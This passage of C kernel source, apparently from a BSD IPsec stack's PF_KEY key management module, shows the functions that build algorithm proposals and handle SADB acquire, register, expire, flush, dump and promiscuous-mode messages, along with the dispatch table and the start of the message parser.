comb->sadb_comb_hard_usetime = comb->sadb_comb_hard_usetime * 80 / 100; } /* * XXX reorder combinations by preference * XXX no idea if the user wants ESP authentication or not */ static struct mbuf * key_getcomb_esp(void) { struct sadb_comb *comb; struct enc_xform *algo; struct mbuf *result = NULL, *m, *n; int encmin; int i, off, o; int totlen; const int l = PFKEY_ALIGN8(sizeof(struct sadb_comb)); m = NULL; for (i = 1; i <= SADB_EALG_MAX; i++) { algo = esp_algorithm_lookup(i); if (algo == NULL) continue; /* discard algorithms with key size smaller than system min */ if (_BITS(algo->maxkey) < ipsec_esp_keymin) continue; if (_BITS(algo->minkey) < ipsec_esp_keymin) encmin = ipsec_esp_keymin; else encmin = _BITS(algo->minkey); if (ipsec_esp_auth) m = key_getcomb_ah(); else { KASSERT(l <= MLEN, ("key_getcomb_esp: l=%u > MLEN=%lu", l, (u_long) MLEN)); MGET(m, MB_DONTWAIT, MT_DATA); if (m) { M_ALIGN(m, l); m->m_len = l; m->m_next = NULL; bzero(mtod(m, caddr_t), m->m_len); } } if (!m) goto fail; totlen = m_lengthm(m, NULL); KASSERT((totlen % l) == 0, ("key_getcomb_esp: totlen=%u, l=%u", totlen, l)); for (off = 0; off < totlen; off += l) { n = m_pulldown(m, off, l, &o); if (!n) { /* m is already freed */ goto fail; } comb = (struct sadb_comb *)(mtod(n, caddr_t) + o); bzero(comb, sizeof(*comb)); key_getcomb_setlifetime(comb); comb->sadb_comb_encrypt = i; comb->sadb_comb_encrypt_minbits = encmin; comb->sadb_comb_encrypt_maxbits = _BITS(algo->maxkey); } if (!result) result = m; else m_cat(result, m); } return result; fail: if (result) m_freem(result); return NULL; } static void key_getsizes_ah( const struct auth_hash *ah, int alg, u_int16_t* min, u_int16_t* max) { *min = *max = ah->keysize; if (ah->keysize == 0) { /* * Transform takes arbitrary key size but algorithm * key size is restricted. Enforce this here. */ switch (alg) { case SADB_X_AALG_MD5: *min = *max = 16; break; case SADB_X_AALG_SHA: *min = *max = 20; break; case SADB_X_AALG_NULL: *min = 1; *max = 256; break; default: DPRINTF(("key_getsizes_ah: unknown AH algorithm %u\n", alg)); break; } } } /* * XXX reorder combinations by preference */ static struct mbuf * key_getcomb_ah(void) { struct sadb_comb *comb; struct auth_hash *algo; struct mbuf *m; u_int16_t minkeysize, maxkeysize; int i; const int l = PFKEY_ALIGN8(sizeof(struct sadb_comb)); m = NULL; for (i = 1; i <= SADB_AALG_MAX; i++) { #if 1 /* we prefer HMAC algorithms, not old algorithms */ if (i != SADB_AALG_SHA1HMAC && i != SADB_AALG_MD5HMAC) continue; #endif algo = ah_algorithm_lookup(i); if (!algo) continue; key_getsizes_ah(algo, i, &minkeysize, &maxkeysize); /* discard algorithms with key size smaller than system min */ if (_BITS(minkeysize) < ipsec_ah_keymin) continue; if (!m) { KASSERT(l <= MLEN, ("key_getcomb_ah: l=%u > MLEN=%lu", l, (u_long) MLEN)); MGET(m, MB_DONTWAIT, MT_DATA); if (m) { M_ALIGN(m, l); m->m_len = l; m->m_next = NULL; } } else M_PREPEND(m, l, MB_DONTWAIT); if (!m) return NULL; comb = mtod(m, struct sadb_comb *); bzero(comb, sizeof(*comb)); key_getcomb_setlifetime(comb); comb->sadb_comb_auth = i; comb->sadb_comb_auth_minbits = _BITS(minkeysize); comb->sadb_comb_auth_maxbits = _BITS(maxkeysize); } return m; } /* * not really an official behavior. discussed in pf_key@inner.net in Sep2000. * XXX reorder combinations by preference */ static struct mbuf * key_getcomb_ipcomp(void) { struct sadb_comb *comb; struct comp_algo *algo; struct mbuf *m; int i; const int l = PFKEY_ALIGN8(sizeof(struct sadb_comb)); m = NULL; for (i = 1; i <= SADB_X_CALG_MAX; i++) { algo = ipcomp_algorithm_lookup(i); if (!algo) continue; if (!m) { KASSERT(l <= MLEN, ("key_getcomb_ipcomp: l=%u > MLEN=%lu", l, (u_long) MLEN)); MGET(m, MB_DONTWAIT, MT_DATA); if (m) { M_ALIGN(m, l); m->m_len = l; m->m_next = NULL; } } else M_PREPEND(m, l, MB_DONTWAIT); if (!m) return NULL; comb = mtod(m, struct sadb_comb *); bzero(comb, sizeof(*comb)); key_getcomb_setlifetime(comb); comb->sadb_comb_encrypt = i; /* what should we set into sadb_comb_*_{min,max}bits? */ } return m; } /* * XXX no way to pass mode (transport/tunnel) to userland * XXX replay checking? * XXX sysctl interface to ipsec_{ah,esp}_keymin */ static struct mbuf * key_getprop(const struct secasindex *saidx) { struct sadb_prop *prop; struct mbuf *m; const int l = PFKEY_ALIGN8(sizeof(struct sadb_prop)); switch (saidx->proto) { case IPPROTO_ESP: m = key_getcomb_esp(); break; case IPPROTO_AH: m = key_getcomb_ah(); break; case IPPROTO_IPCOMP: m = key_getcomb_ipcomp(); break; default: return NULL; } if (!m) return NULL; M_PREPEND(m, l, MB_DONTWAIT); if (!m) return NULL; prop = mtod(m, struct sadb_prop *); bzero(prop, sizeof(*prop)); prop->sadb_prop_len = PFKEY_UNIT64(m_lengthm(m, NULL)); prop->sadb_prop_exttype = SADB_EXT_PROPOSAL; prop->sadb_prop_replay = 32; /* XXX */ return m; } /* * SADB_ACQUIRE processing called by key_checkrequest() and key_acquire2(). * send * <base, SA, address(SD), (address(P)), x_policy, * (identity(SD),) (sensitivity,) proposal> * to KMD, and expect to receive * <base> with SADB_ACQUIRE if error occured, * or * <base, src address, dst address, (SPI range)> with SADB_GETSPI * from KMD by PF_KEY. * * XXX x_policy is outside of RFC2367 (KAME extension). * XXX sensitivity is not supported. * XXX for ipcomp, RFC2367 does not define how to fill in proposal. * see comment for key_getcomb_ipcomp(). * * OUT: * 0 : succeed * others: error number */ static int key_acquire(const struct secasindex *saidx, struct secpolicy *sp) { struct mbuf *result = NULL, *m; #ifndef IPSEC_NONBLOCK_ACQUIRE struct secacq *newacq; #endif u_int8_t satype; int error = -1; u_int32_t seq; /* sanity check */ KASSERT(saidx != NULL, ("key_acquire: null saidx")); satype = key_proto2satype(saidx->proto); KASSERT(satype != 0, ("key_acquire: null satype, protocol %u", saidx->proto)); #ifndef IPSEC_NONBLOCK_ACQUIRE /* * We never do anything about acquirng SA. There is anather * solution that kernel blocks to send SADB_ACQUIRE message until * getting something message from IKEd. In later case, to be * managed with ACQUIRING list. */ /* Get an entry to check whether sending message or not. */ if ((newacq = key_getacq(saidx)) != NULL) { if (key_blockacq_count < newacq->count) { /* reset counter and do send message. */ newacq->count = 0; } else { /* increment counter and do nothing. */ newacq->count++; return 0; } } else { /* make new entry for blocking to send SADB_ACQUIRE. */ if ((newacq = key_newacq(saidx)) == NULL) return ENOBUFS; /* add to acqtree */ LIST_INSERT_HEAD(&acqtree, newacq, chain); } #endif #ifndef IPSEC_NONBLOCK_ACQUIRE seq = newacq->seq; #else seq = (acq_seq = (acq_seq == ~0 ? 1 : ++acq_seq)); #endif m = key_setsadbmsg(SADB_ACQUIRE, 0, satype, seq, 0, 0); if (!m) { error = ENOBUFS; goto fail; } result = m; /* set sadb_address for saidx's. */ m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC, &saidx->src.sa, FULLMASK, IPSEC_ULPROTO_ANY); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); m = key_setsadbaddr(SADB_EXT_ADDRESS_DST, &saidx->dst.sa, FULLMASK, IPSEC_ULPROTO_ANY); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); /* XXX proxy address (optional) */ /* set sadb_x_policy */ if (sp) { m = key_setsadbxpolicy(sp->policy, sp->spidx.dir, sp->id); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); } /* XXX identity (optional) */ #if 0 if (idexttype && fqdn) { /* create identity extension (FQDN) */ struct sadb_ident *id; int fqdnlen; fqdnlen = strlen(fqdn) + 1; /* +1 for terminating-NUL */ id = (struct sadb_ident *)p; bzero(id, sizeof(*id) + PFKEY_ALIGN8(fqdnlen)); id->sadb_ident_len = PFKEY_UNIT64(sizeof(*id) + PFKEY_ALIGN8(fqdnlen)); id->sadb_ident_exttype = idexttype; id->sadb_ident_type = SADB_IDENTTYPE_FQDN; bcopy(fqdn, id + 1, fqdnlen); p += sizeof(struct sadb_ident) + PFKEY_ALIGN8(fqdnlen); } if (idexttype) { /* create identity extension (USERFQDN) */ struct sadb_ident *id; int userfqdnlen; if (userfqdn) { /* +1 for terminating-NUL */ userfqdnlen = strlen(userfqdn) + 1; } else userfqdnlen = 0; id = (struct sadb_ident *)p; bzero(id, sizeof(*id) + PFKEY_ALIGN8(userfqdnlen)); id->sadb_ident_len = PFKEY_UNIT64(sizeof(*id) + PFKEY_ALIGN8(userfqdnlen)); id->sadb_ident_exttype = idexttype; id->sadb_ident_type = SADB_IDENTTYPE_USERFQDN; /* XXX is it correct? */ if (curproc && curproc->p_cred) id->sadb_ident_id = curproc->p_cred->p_ruid; if (userfqdn && userfqdnlen) bcopy(userfqdn, id + 1, userfqdnlen); p += sizeof(struct sadb_ident) + PFKEY_ALIGN8(userfqdnlen); } #endif /* XXX sensitivity (optional) */ /* create proposal/combination extension */ m = key_getprop(saidx); #if 0 /* * spec conformant: always attach proposal/combination extension, * the problem is that we have no way to attach it for ipcomp, * due to the way sadb_comb is declared in RFC2367. */ if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); #else /* * outside of spec; make proposal/combination extension optional. */ if (m) m_cat(result, m); #endif if ((result->m_flags & M_PKTHDR) == 0) { error = EINVAL; goto fail; } if (result->m_len < sizeof(struct sadb_msg)) { result = m_pullup(result, sizeof(struct sadb_msg)); if (result == NULL) { error = ENOBUFS; goto fail; } } result->m_pkthdr.len = m_lengthm(result, NULL); mtod(result, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(result->m_pkthdr.len); return key_sendup_mbuf(NULL, result, KEY_SENDUP_REGISTERED); fail: if (result) m_freem(result); return error; } #ifndef IPSEC_NONBLOCK_ACQUIRE static struct secacq * key_newacq(const struct secasindex *saidx) { struct secacq *newacq; /* get new entry */ KMALLOC(newacq, struct secacq *, sizeof(struct secacq)); if (newacq == NULL) { ipseclog((LOG_DEBUG, "key_newacq: No more memory.\n")); return NULL; } bzero(newacq, sizeof(*newacq)); /* copy secindex */ bcopy(saidx, &newacq->saidx, sizeof(newacq->saidx)); newacq->seq = (acq_seq == ~0 ? 1 : ++acq_seq); newacq->created = time_second; newacq->count = 0; return newacq; } static struct secacq * key_getacq(const struct secasindex *saidx) { struct secacq *acq; LIST_FOREACH(acq, &acqtree, chain) { if (key_cmpsaidx(saidx, &acq->saidx, CMP_EXACTLY)) return acq; } return NULL; } static struct secacq * key_getacqbyseq(u_int32_t seq) { struct secacq *acq; LIST_FOREACH(acq, &acqtree, chain) { if (acq->seq == seq) return acq; } return NULL; } #endif static struct secspacq * key_newspacq(struct secpolicyindex *spidx) { struct secspacq *acq; /* get new entry */ KMALLOC(acq, struct secspacq *, sizeof(struct secspacq)); if (acq == NULL) { ipseclog((LOG_DEBUG, "key_newspacq: No more memory.\n")); return NULL; } bzero(acq, sizeof(*acq)); /* copy secindex */ bcopy(spidx, &acq->spidx, sizeof(acq->spidx)); acq->created = time_second; acq->count = 0; return acq; } static struct secspacq * key_getspacq(struct secpolicyindex *spidx) { struct secspacq *acq; LIST_FOREACH(acq, &spacqtree, chain) { if (key_cmpspidx_exactly(spidx, &acq->spidx)) return acq; } return NULL; } /* * SADB_ACQUIRE processing, * in first situation, is receiving * <base> * from the ikmpd, and clear sequence of its secasvar entry. * * In second situation, is receiving * <base, address(SD), (address(P),) (identity(SD),) (sensitivity,) proposal> * from a user land process, and return * <base, address(SD), (address(P),) (identity(SD),) (sensitivity,) proposal> * to the socket. * * m will always be freed. */ static int key_acquire2(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { const struct sadb_address *src0, *dst0; struct secasindex saidx; struct secashead *sah; u_int16_t proto; int error; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_acquire2: NULL pointer is passed.\n"); /* * Error message from KMd. * We assume that if error was occured in IKEd, the length of PFKEY * message is equal to the size of sadb_msg structure. * We do not raise error even if error occured in this function. */ if (mhp->msg->sadb_msg_len == PFKEY_UNIT64(sizeof(struct sadb_msg))) { #ifndef IPSEC_NONBLOCK_ACQUIRE struct secacq *acq; /* check sequence number */ if (mhp->msg->sadb_msg_seq == 0) { ipseclog((LOG_DEBUG, "key_acquire2: must specify sequence number.\n")); m_freem(m); return 0; } if ((acq = key_getacqbyseq(mhp->msg->sadb_msg_seq)) == NULL) { /* * the specified larval SA is already gone, or we got * a bogus sequence number. we can silently ignore it. */ m_freem(m); return 0; } /* reset acq counter in order to deletion by timehander. */ acq->created = time_second; acq->count = 0; #endif m_freem(m); return 0; } /* * This message is from user land. */ /* map satype to proto */ if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) { ipseclog((LOG_DEBUG, "key_acquire2: invalid satype is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL || mhp->ext[SADB_EXT_ADDRESS_DST] == NULL || mhp->ext[SADB_EXT_PROPOSAL] == NULL) { /* error */ ipseclog((LOG_DEBUG, "key_acquire2: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_PROPOSAL] < sizeof(struct sadb_prop)) { /* error */ ipseclog((LOG_DEBUG, "key_acquire2: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } src0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_SRC]; dst0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_DST]; /* XXX boundary check against sa_len */ KEY_SETSECASIDX(proto, IPSEC_MODE_ANY, 0, src0 + 1, dst0 + 1, &saidx); /* get a SA index */ LIST_FOREACH(sah, &sahtree, chain) { if (sah->state == SADB_SASTATE_DEAD) continue; if (key_cmpsaidx(&sah->saidx, &saidx, CMP_MODE_REQID)) break; } if (sah != NULL) { ipseclog((LOG_DEBUG, "key_acquire2: a SA exists already.\n")); return key_senderror(so, m, EEXIST); } error = key_acquire(&saidx, NULL); if (error != 0) { ipseclog((LOG_DEBUG, "key_acquire2: error %d returned " "from key_acquire.\n", mhp->msg->sadb_msg_errno)); return key_senderror(so, m, error); } return key_sendup_mbuf(so, m, KEY_SENDUP_REGISTERED); } /* * SADB_REGISTER processing. * If SATYPE_UNSPEC has been passed as satype, only return sabd_supported. * receive * <base> * from the ikmpd, and register a socket to send PF_KEY messages, * and send * <base, supported> * to KMD by PF_KEY. * If socket is detached, must free from regnode. * * m will always be freed. */ static int key_register(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct secreg *reg, *newreg = NULL; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_register: NULL pointer is passed.\n"); /* check for invalid register message */ if (mhp->msg->sadb_msg_satype >= NELEM(regtree)) return key_senderror(so, m, EINVAL); /* When SATYPE_UNSPEC is specified, only return sabd_supported. */ if (mhp->msg->sadb_msg_satype == SADB_SATYPE_UNSPEC) goto setmsg; /* check whether existing or not */ LIST_FOREACH(reg, &regtree[mhp->msg->sadb_msg_satype], chain) { if (reg->so == so) { ipseclog((LOG_DEBUG, "key_register: socket exists already.\n")); return key_senderror(so, m, EEXIST); } } /* create regnode */ KMALLOC(newreg, struct secreg *, sizeof(*newreg)); if (newreg == NULL) { ipseclog((LOG_DEBUG, "key_register: No more memory.\n")); return key_senderror(so, m, ENOBUFS); } bzero((caddr_t)newreg, sizeof(*newreg)); newreg->so = so; ((struct keycb *)sotorawcb(so))->kp_registered++; /* add regnode to regtree. */ LIST_INSERT_HEAD(&regtree[mhp->msg->sadb_msg_satype], newreg, chain); setmsg: { struct mbuf *n; struct sadb_msg *newmsg; struct sadb_supported *sup; u_int len, alen, elen; int off; int i; struct sadb_alg *alg; /* create new sadb_msg to reply. */ alen = 0; for (i = 1; i <= SADB_AALG_MAX; i++) { if (ah_algorithm_lookup(i)) alen += sizeof(struct sadb_alg); } if (alen) alen += sizeof(struct sadb_supported); elen = 0; for (i = 1; i <= SADB_EALG_MAX; i++) { if (esp_algorithm_lookup(i)) elen += sizeof(struct sadb_alg); } if (elen) elen += sizeof(struct sadb_supported); len = sizeof(struct sadb_msg) + alen + elen; if (len > MCLBYTES) return key_senderror(so, m, ENOBUFS); n = m_getb(len, MB_DONTWAIT, MT_DATA, M_PKTHDR); if (!n) return key_senderror(so, m, ENOBUFS); n->m_pkthdr.len = n->m_len = len; m_copydata(m, 0, sizeof(struct sadb_msg), mtod(n, caddr_t)); newmsg = mtod(n, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(len); off = PFKEY_ALIGN8(sizeof(struct sadb_msg)); /* for authentication algorithm */ if (alen) { sup = (struct sadb_supported *)(mtod(n, caddr_t) + off); sup->sadb_supported_len = PFKEY_UNIT64(alen); sup->sadb_supported_exttype = SADB_EXT_SUPPORTED_AUTH; off += PFKEY_ALIGN8(sizeof(*sup)); for (i = 1; i <= SADB_AALG_MAX; i++) { struct auth_hash *aalgo; u_int16_t minkeysize, maxkeysize; aalgo = ah_algorithm_lookup(i); if (!aalgo) continue; alg = (struct sadb_alg *)(mtod(n, caddr_t) + off); alg->sadb_alg_id = i; alg->sadb_alg_ivlen = 0; key_getsizes_ah(aalgo, i, &minkeysize, &maxkeysize); alg->sadb_alg_minbits = _BITS(minkeysize); alg->sadb_alg_maxbits = _BITS(maxkeysize); off += PFKEY_ALIGN8(sizeof(*alg)); } } /* for encryption algorithm */ if (elen) { sup = (struct sadb_supported *)(mtod(n, caddr_t) + off); sup->sadb_supported_len = PFKEY_UNIT64(elen); sup->sadb_supported_exttype = SADB_EXT_SUPPORTED_ENCRYPT; off += PFKEY_ALIGN8(sizeof(*sup)); for (i = 1; i <= SADB_EALG_MAX; i++) { struct enc_xform *ealgo; ealgo = esp_algorithm_lookup(i); if (!ealgo) continue; alg = (struct sadb_alg *)(mtod(n, caddr_t) + off); alg->sadb_alg_id = i; alg->sadb_alg_ivlen = ealgo->blocksize; alg->sadb_alg_minbits = _BITS(ealgo->minkey); alg->sadb_alg_maxbits = _BITS(ealgo->maxkey); off += PFKEY_ALIGN8(sizeof(struct sadb_alg)); } } #ifdef DIGAGNOSTIC if (off != len) panic("length assumption failed in key_register"); #endif m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_REGISTERED); } } /* * free secreg entry registered. * XXX: I want to do free a socket marked done SADB_RESIGER to socket. */ void key_freereg(struct socket *so) { struct secreg *reg; int i; /* sanity check */ if (so == NULL) panic("key_freereg: NULL pointer is passed.\n"); /* * check whether existing or not. * check all type of SA, because there is a potential that * one socket is registered to multiple type of SA. */ for (i = 0; i <= SADB_SATYPE_MAX; i++) { LIST_FOREACH(reg, &regtree[i], chain) { if (reg->so == so && __LIST_CHAINED(reg)) { LIST_REMOVE(reg, chain); KFREE(reg); break; } } } return; } /* * SADB_EXPIRE processing * send * <base, SA, SA2, lifetime(C and one of HS), address(SD)> * to KMD by PF_KEY. * NOTE: We send only soft lifetime extension. * * OUT: 0 : succeed * others : error number */ static int key_expire(struct secasvar *sav) { int satype; struct mbuf *result = NULL, *m; int len; int error = -1; struct sadb_lifetime *lt; /* XXX: Why do we lock ? */ crit_enter(); /* sanity check */ if (sav == NULL) panic("key_expire: NULL pointer is passed.\n"); if (sav->sah == NULL) panic("key_expire: Why was SA index in SA NULL.\n"); if ((satype = key_proto2satype(sav->sah->saidx.proto)) == 0) panic("key_expire: invalid proto is passed.\n"); /* set msg header */ m = key_setsadbmsg(SADB_EXPIRE, 0, satype, sav->seq, 0, sav->refcnt); if (!m) { error = ENOBUFS; goto fail; } result = m; /* create SA extension */ m = key_setsadbsa(sav); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); /* create SA extension */ m = key_setsadbxsa2(sav->sah->saidx.mode, sav->replay ? sav->replay->count : 0, sav->sah->saidx.reqid); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); /* create lifetime extension (current and soft) */ len = PFKEY_ALIGN8(sizeof(*lt)) * 2; m = key_alloc_mbuf(len); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); error = ENOBUFS; goto fail; } bzero(mtod(m, caddr_t), len); lt = mtod(m, struct sadb_lifetime *); lt->sadb_lifetime_len = PFKEY_UNIT64(sizeof(struct sadb_lifetime)); lt->sadb_lifetime_exttype = SADB_EXT_LIFETIME_CURRENT; lt->sadb_lifetime_allocations = sav->lft_c->sadb_lifetime_allocations; lt->sadb_lifetime_bytes = sav->lft_c->sadb_lifetime_bytes; lt->sadb_lifetime_addtime = sav->lft_c->sadb_lifetime_addtime; lt->sadb_lifetime_usetime = sav->lft_c->sadb_lifetime_usetime; lt = (struct sadb_lifetime *)(mtod(m, caddr_t) + len / 2); bcopy(sav->lft_s, lt, sizeof(*lt)); m_cat(result, m); /* set sadb_address for source */ m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC, &sav->sah->saidx.src.sa, FULLMASK, IPSEC_ULPROTO_ANY); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); /* set sadb_address for destination */ m = key_setsadbaddr(SADB_EXT_ADDRESS_DST, &sav->sah->saidx.dst.sa, FULLMASK, IPSEC_ULPROTO_ANY); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); if ((result->m_flags & M_PKTHDR) == 0) { error = EINVAL; goto fail; } if (result->m_len < sizeof(struct sadb_msg)) { result = m_pullup(result, sizeof(struct sadb_msg)); if (result == NULL) { error = ENOBUFS; goto fail; } } result->m_pkthdr.len = m_lengthm(result, NULL); mtod(result, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(result->m_pkthdr.len); crit_exit(); return key_sendup_mbuf(NULL, result, KEY_SENDUP_REGISTERED); fail: if (result) m_freem(result); crit_exit(); return error; } /* * SADB_FLUSH processing * receive * <base> * from the ikmpd, and free all entries in secastree. * and send, * <base> * to the ikmpd. * NOTE: to do is only marking SADB_SASTATE_DEAD. * * m will always be freed. */ static int key_flush(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_msg *newmsg; struct secashead *sah; u_int16_t proto; u_int stateidx; /* sanity check */ if (so == NULL || mhp == NULL || mhp->msg == NULL) panic("key_flush: NULL pointer is passed.\n"); /* map satype to proto */ if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) { ipseclog((LOG_DEBUG, "key_flush: invalid satype is passed.\n")); return key_senderror(so, m, EINVAL); } /* no SATYPE specified, i.e. flushing all SA. */ LIST_FOREACH(sah, &sahtree, chain) { if (mhp->msg->sadb_msg_satype != SADB_SATYPE_UNSPEC && proto != sah->saidx.proto) continue; for (stateidx = 0; stateidx < NELEM(saorder_state_alive); stateidx++) { struct secasvar *sav, *nextsav; u_int8_t state = saorder_state_any[stateidx]; LIST_FOREACH_MUTABLE(sav, &sah->savtree[state], chain, nextsav) { key_sa_chgstate(sav, SADB_SASTATE_DEAD); KEY_FREESAV(&sav); } } sah->state = SADB_SASTATE_DEAD; } if (m->m_len < sizeof(struct sadb_msg) || sizeof(struct sadb_msg) > m->m_len + M_TRAILINGSPACE(m)) { ipseclog((LOG_DEBUG, "key_flush: No more memory.\n")); return key_senderror(so, m, ENOBUFS); } if (m->m_next) m_freem(m->m_next); m->m_next = NULL; m->m_pkthdr.len = m->m_len = sizeof(struct sadb_msg); newmsg = mtod(m, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(m->m_pkthdr.len); return key_sendup_mbuf(so, m, KEY_SENDUP_ALL); } /* * SADB_DUMP processing * dump all entries including status of DEAD in SAD. * receive * <base> * from the ikmpd, and dump all secasvar leaves * and send, * <base> ..... * to the ikmpd. * * m will always be freed. */ static int key_dump(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct secashead *sah; struct secasvar *sav; u_int16_t proto; u_int stateidx; u_int8_t satype; u_int8_t state; int cnt; struct sadb_msg *newmsg; struct mbuf *n; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_dump: NULL pointer is passed.\n"); /* map satype to proto */ if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) { ipseclog((LOG_DEBUG, "key_dump: invalid satype is passed.\n")); return key_senderror(so, m, EINVAL); } /* count sav entries to be sent to the userland. */ cnt = 0; LIST_FOREACH(sah, &sahtree, chain) { if (mhp->msg->sadb_msg_satype != SADB_SATYPE_UNSPEC && proto != sah->saidx.proto) continue; for (stateidx = 0; stateidx < NELEM(saorder_state_any); stateidx++) { state = saorder_state_any[stateidx]; LIST_FOREACH(sav, &sah->savtree[state], chain) { cnt++; } } } if (cnt == 0) return key_senderror(so, m, ENOENT); /* send this to the userland, one at a time. */ newmsg = NULL; LIST_FOREACH(sah, &sahtree, chain) { if (mhp->msg->sadb_msg_satype != SADB_SATYPE_UNSPEC && proto != sah->saidx.proto) continue; /* map proto to satype */ if ((satype = key_proto2satype(sah->saidx.proto)) == 0) { ipseclog((LOG_DEBUG, "key_dump: there was invalid proto in SAD.\n")); return key_senderror(so, m, EINVAL); } for (stateidx = 0; stateidx < NELEM(saorder_state_any); stateidx++) { state = saorder_state_any[stateidx]; LIST_FOREACH(sav, &sah->savtree[state], chain) { n = key_setdumpsa(sav, SADB_DUMP, satype, --cnt, mhp->msg->sadb_msg_pid); if (!n) return key_senderror(so, m, ENOBUFS); key_sendup_mbuf(so, n, KEY_SENDUP_ONE); } } } m_freem(m); return 0; } /* * SADB_X_PROMISC processing * * m will always be freed. */ static int key_promisc(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { int olen; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_promisc: NULL pointer is passed.\n"); olen = PFKEY_UNUNIT64(mhp->msg->sadb_msg_len); if (olen < sizeof(struct sadb_msg)) { #if 1 return key_senderror(so, m, EINVAL); #else m_freem(m); return 0; #endif } else if (olen == sizeof(struct sadb_msg)) { /* enable/disable promisc mode */ struct keycb *kp; if ((kp = (struct keycb *)sotorawcb(so)) == NULL) return key_senderror(so, m, EINVAL); mhp->msg->sadb_msg_errno = 0; switch (mhp->msg->sadb_msg_satype) { case 0: case 1: kp->kp_promisc = mhp->msg->sadb_msg_satype; break; default: return key_senderror(so, m, EINVAL); } /* send the original message back to everyone */ mhp->msg->sadb_msg_errno = 0; return key_sendup_mbuf(so, m, KEY_SENDUP_ALL); } else { /* send packet as is */ m_adj(m, PFKEY_ALIGN8(sizeof(struct sadb_msg))); /* TODO: if sadb_msg_seq is specified, send to specific pid */ return key_sendup_mbuf(so, m, KEY_SENDUP_ALL); } } static int (*key_typesw[]) (struct socket *, struct mbuf *, const struct sadb_msghdr *) = { NULL, /* SADB_RESERVED */ key_getspi, /* SADB_GETSPI */ key_update, /* SADB_UPDATE */ key_add, /* SADB_ADD */ key_delete, /* SADB_DELETE */ key_get, /* SADB_GET */ key_acquire2, /* SADB_ACQUIRE */ key_register, /* SADB_REGISTER */ NULL, /* SADB_EXPIRE */ key_flush, /* SADB_FLUSH */ key_dump, /* SADB_DUMP */ key_promisc, /* SADB_X_PROMISC */ NULL, /* SADB_X_PCHANGE */ key_spdadd, /* SADB_X_SPDUPDATE */ key_spdadd, /* SADB_X_SPDADD */ key_spddelete, /* SADB_X_SPDDELETE */ key_spdget, /* SADB_X_SPDGET */ NULL, /* SADB_X_SPDACQUIRE */ key_spddump, /* SADB_X_SPDDUMP */ key_spdflush, /* SADB_X_SPDFLUSH */ key_spdadd, /* SADB_X_SPDSETIDX */ NULL, /* SADB_X_SPDEXPIRE */ key_spddelete2, /* SADB_X_SPDDELETE2 */ }; /* * parse sadb_msg buffer to process PFKEYv2, * and create a data to response if needed. * I think to be dealed with mbuf directly. * IN: * msgp : pointer to pointer to a received buffer pulluped. * This is rewrited to response. * so : pointer to socket. * OUT: * length for buffer to send to user process. */ int key_parse(struct mbuf *m, struct socket *so) { struct sadb_msg *msg; struct sadb_msghdr mh; u_int orglen; int error; int target; /* sanity check */ if (m == NULL || so == NULL) panic("key_parse: NULL pointer is passed.\n"); #if 0 /*kdebug_sadb assumes msg in linear buffer*/ KEYDEBUG(KEYDEBUG_KEY_DUMP, ipseclog((LOG_DEBUG, "key_parse: passed sadb_msg\n")); kdebug_sadb(msg)); #endif if (m->m_len < sizeof(struct sadb_msg)) { m = m_pullup(m, sizeof(struct sadb_msg)); if (!m) return ENOBUFS; } msg = mtod(m, struct sadb_msg *); orglen = PFKEY_UNUNIT64(msg->sadb_msg_len); target = KEY_SENDUP_ONE; if ((m->m_flags & M_PKTHDR) == 0 || m->m_pkthdr.len != m->m_pkthdr.len) { ipseclog((LOG_DEBUG, "key_parse: invalid message length.\n")); pfkeystat.out_invlen++; error = EINVAL; goto senderror; } if (msg->sadb_msg_version != PF_KEY_V2) { ipseclog((LOG_DEBUG, "key_parse: PF_KEY version %u is mismatched.\n", msg->sadb_msg_version)); pfkeystat.out_invver++; error = EINVAL; goto senderror; } if (msg->sadb_msg_type > SADB_MAX) { ipseclog((LOG_DEBUG, "key_parse: invalid type %u is passed.\n", msg->sadb_msg_type)); pfkeystat.out_invmsgtype++; error = EINVAL; goto senderror; } /* for old-fashioned code - should be nuked */ if (m->m_pkthdr.len > MCLBYTES) { m_freem(m); return ENOBUFS; } if (m->m_next) { struct mbuf *n; n = m_getb(m->m_pkthdr.len, MB_DONTWAIT, MT_DATA, M_PKTHDR); if (!n) { m_freem(m); return ENOBUFS; } m_copydata(m, 